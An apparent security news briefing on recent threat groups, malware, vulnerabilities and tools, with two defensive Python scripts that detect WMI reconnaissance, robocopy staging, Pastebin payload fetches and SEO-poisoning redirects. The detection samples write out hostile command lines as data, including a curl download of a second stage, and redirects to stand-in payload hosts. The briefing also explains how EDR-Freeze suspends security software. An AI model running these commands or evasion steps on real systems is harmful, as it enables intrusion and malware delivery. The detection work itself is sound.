This morning's security briefing covers fourteen InfoSec articles reviewed from Saturday, September 21st through Sunday, September 22nd.
Threat Intelligence.
GOLD SALEM, the threat group Microsoft tracks as Storm-2603 and which is assessed as possibly China-based, has emerged as a new ransomware operation, Warlock Group, with sixty victims posted to its leak site since March 2025. Notably, the group has listed a Russia-based victim, which suggests it operates outside Russian jurisdiction; ransomware groups based in Russia typically avoid Russian targets.
APT28 continues to lean on legitimate web services for command and control: recent campaigns abuse icedrive.net as a bidirectional channel for the group's BeardShell malware, so the C2 traffic blends into ordinary cloud-storage API calls. Bloody Wolf has been observed deploying STRRAT, a Java-based RAT, which runs an extensive set of WMI queries to enumerate system information, disk volumes, and installed antivirus products for reconnaissance. Each of those queries is also routine administrative activity; the signal is a single unexpected parent process, here a Java runtime, issuing several of them in quick succession.
Malware.
SnakeDisk, attributed to Mustang Panda, is a USB worm that uses robocopy commands to move files and executables across removable media drives, spreading whenever an infected drive is plugged into another host. Malicious PyPI packages sisaws and secmeasure deliver the SilentSync RAT via typosquatting, retrieving their payload from Pastebin with curl commands; a dependency whose install step shells out to curl against a paste site is a red flag worth catching in CI before it reaches a developer workstation.
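As an added example (not code from any of the reports summarised here), the following Python hunting rules cover the host-side tradecraft in the two items above: STRRAT's WMI reconnaissance queries, SnakeDisk's robocopy staging onto other drives, and the curl fetch from Pastebin used by the sisaws and secmeasure packages. The process events are constructed for the example, the non-system-drive check stands in for a real removable-drive lookup, and the two-category threshold is an assumption chosen to keep lone administrative queries out of the results.

```python
"""Hunting rules for the host-side tradecraft in the briefing: WMI recon
(STRRAT), robocopy staging onto other drives (SnakeDisk) and curl fetches
from Pastebin (the SilentSync PyPI packages). Events are constructed for
this example; in practice they come from Sysmon Event ID 1 or EDR telemetry."""
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_pid: int
    image: str          # path of the new process
    command_line: str


# Constructed sample telemetry, not real captures.
SAMPLE_EVENTS = [
    # A Java process (STRRAT is Java-based) spawning three WMIC recon queries.
    ProcEvent(4120, 3000, r"C:\Windows\System32\wbem\WMIC.exe",
              r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"),
    ProcEvent(4121, 3000, r"C:\Windows\System32\wbem\WMIC.exe",
              "wmic logicaldisk get caption,description,filesystem,size"),
    ProcEvent(4122, 3000, r"C:\Windows\System32\wbem\WMIC.exe",
              "wmic os get caption,version,osarchitecture"),
    # An unsigned binary in %APPDATA% moving documents onto drive E:.
    ProcEvent(4130, 3100, r"C:\Windows\System32\Robocopy.exe",
              r"robocopy C:\Users\alice\Documents E:\Documents /E /MOV"),
    # A Python interpreter pulling a second stage from Pastebin.
    ProcEvent(4140, 3200, r"C:\Windows\System32\curl.exe",
              r"curl -s https://pastebin.com/raw/abcdef12 -o %TEMP%\stage.py"),
    # Benign noise: a backup job to a UNC share and a lone admin query.
    ProcEvent(4150, 3300, r"C:\Windows\System32\Robocopy.exe",
              r"robocopy D:\Backups \\fileserver\backups /MIR"),
    ProcEvent(4160, 3400, r"C:\Windows\System32\wbem\WMIC.exe",
              "wmic os get caption"),
]

# Each category is a piece of host recon the briefing attributes to STRRAT.
RECON_PATTERNS = {
    "av_products": re.compile(r"securitycenter2.*antivirusproduct", re.I),
    "disk_volumes": re.compile(r"\b(win32_)?logicaldisk\b", re.I),
    "os_info": re.compile(r"\b(os get|win32_operatingsystem)\b", re.I),
}
SYSTEM_DRIVE = "C"  # assumption for the heuristic below


def wmi_recon_by_parent(events, min_categories=2):
    """Group recon queries by the parent that issued them. One query is normal
    admin activity; one parent touching several categories is the signal."""
    seen = defaultdict(set)
    for ev in events:
        for name, pat in RECON_PATTERNS.items():
            if pat.search(ev.command_line):
                seen[ev.parent_pid].add(name)
    return {ppid: sorted(cats) for ppid, cats in seen.items() if len(cats) >= min_categories}


def robocopy_to_other_drive(events):
    """Heuristic: robocopy whose destination is a drive letter other than the
    system drive. A production rule would join the letter against
    Win32_LogicalDisk DriveType=2 (removable) on the same host; omitted here."""
    hits = []
    for ev in events:
        tokens = ev.command_line.split()
        if len(tokens) < 3 or "robocopy" not in tokens[0].lower():
            continue
        dst = tokens[2]
        m = re.match(r"^([A-Za-z]):\\", dst)
        if m and m.group(1).upper() != SYSTEM_DRIVE:
            hits.append((ev.pid, dst))
    return hits


def pastebin_fetches(events):
    """Any command line carrying a pastebin.com URL (raw paste fetches are how
    the sisaws/secmeasure packages retrieved their payload)."""
    hits = []
    for ev in events:
        for url in re.findall(r"https?://[^\s\"']+", ev.command_line):
            host = urlparse(url).hostname or ""
            if host == "pastebin.com" or host.endswith(".pastebin.com"):
                hits.append((ev.pid, url))
    return hits


def run_rules(events):
    """Return a flat list of (rule, key, detail) findings."""
    findings = []
    for ppid, cats in wmi_recon_by_parent(events).items():
        findings.append(("wmi_recon", ppid, ",".join(cats)))
    for pid, dst in robocopy_to_other_drive(events):
        findings.append(("robocopy_other_drive", pid, dst))
    for pid, url in pastebin_fetches(events):
        findings.append(("pastebin_fetch", pid, url))
    return findings


if __name__ == "__main__":
    for finding in run_rules(SAMPLE_EVENTS):
        print(finding)
```

Against the sample the WMI rule fires once, on the Java parent that issued all three query categories, while the lone `wmic os get caption` from cmd.exe stays below the threshold; the robocopy rule fires on the E: destination but not on the UNC backup job.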
Vulnerabilities.
A critical deserialization vulnerability has been identified in the License Servlet of Fortra's GoAnywhere MFT (CVE-2025-10035); technical details remain under embargo, so until the vendor patch is applied the practical check is to confirm the Admin Console is not reachable from the internet. Separately, new research describes Chypnosis, an undervolting attack that bypasses on-die voltage sensors and extracts cryptographic secrets; the authors demonstrated it against an OpenTitan root-of-trust implementation, so a hardened design is no guarantee against an attacker with physical access to the supply rails.
Tools.
EDR-Freeze is a proof of concept that abuses WerFaultSecure.exe, a Windows Error Reporting component, to suspend EDR and antimalware processes; it needs no vulnerable driver, runs entirely in user mode, and has been demonstrated on Windows 11 24H2. Because the tool relies on a legitimate signed binary, the detection opportunity is WerFaultSecure.exe being launched by something other than the error-reporting service, or with a security product's process as its target. SEO poisoning campaigns are increasingly using JavaScript redirects and meta refresh tags to send visitors from manipulated search results to RATs and potentially unwanted programs; the search-result URL is rarely the one that serves the payload, so checking only the landing URL's reputation misses the final destination.
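As an added example (not code from the SEO-poisoning report), the Python scanner below pulls meta-refresh and JavaScript location redirects out of a page body and flags the ones that leave the originating host, which is the question an analyst asks of a suspicious search result. The sample page and its hostnames are constructed; the referrer-gated redirect in it illustrates a cloaking pattern these campaigns commonly use and is an assumption for the example, not a detail from the briefing.

```python
"""Static check for the redirect mechanisms SEO-poisoned landing pages use:
<meta http-equiv="refresh"> and JavaScript location assignments. Run it over
a fetched page body to see where a search result actually sends the visitor.
The HTML below is constructed for this example, not a real campaign page."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Matches location = "...", location.href = "...", location.replace("...")
# and location.assign("...") with an optional window./document./top./self. prefix.
JS_REDIRECT = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*"
    r"(?:=\s*|\.(?:replace|assign)\s*\(\s*)['\"](?P<url>[^'\"]+)['\"]"
)
META_URL = re.compile(r"url\s*=\s*['\"]?([^'\";]+)", re.I)


class RedirectFinder(HTMLParser):
    """Collects (mechanism, target) pairs in document order."""

    def __init__(self):
        super().__init__()
        self.redirects = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL.search(a.get("content", ""))
            if m:
                self.redirects.append(("meta-refresh", m.group(1).strip()))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands script bodies to handle_data as raw text.
        if self._in_script:
            for m in JS_REDIRECT.finditer(data):
                self.redirects.append(("js-redirect", m.group("url")))


def find_redirects(html, page_host):
    """Return [(mechanism, target, offsite)], where offsite is True when the
    target host differs from the host the page was served from."""
    parser = RedirectFinder()
    parser.feed(html)
    parser.close()
    out = []
    for mechanism, target in parser.redirects:
        host = urlparse(target).hostname
        out.append((mechanism, target, bool(host) and host != page_host))
    return out


# Constructed landing page: a meta refresh plus a referrer-gated JavaScript
# redirect, a cloaking pattern in which only visitors arriving from a search
# engine are sent to the payload host (assumed for the example).
SAMPLE_HTML = """<html><head>
<title>Free PDF converter download</title>
<meta http-equiv="refresh" content="0; url=https://cdn-mirror.example/setup.exe">
</head><body>
<p>Redirecting...</p>
<script>
  if (document.referrer.indexOf("google") !== -1) {
    window.location.href = "https://paste-host.example/loader.msi";
  } else {
    location.replace("/about.html");
  }
</script>
</body></html>"""

if __name__ == "__main__":
    for row in find_redirects(SAMPLE_HTML, "guide-downloads.example"):
        print(row)
```

The scanner is deliberately static: it does not execute the script, so obfuscated or dynamically built targets will escape it, and a headless browser visit with a search-engine referrer remains the authoritative way to confirm where the page sends real visitors.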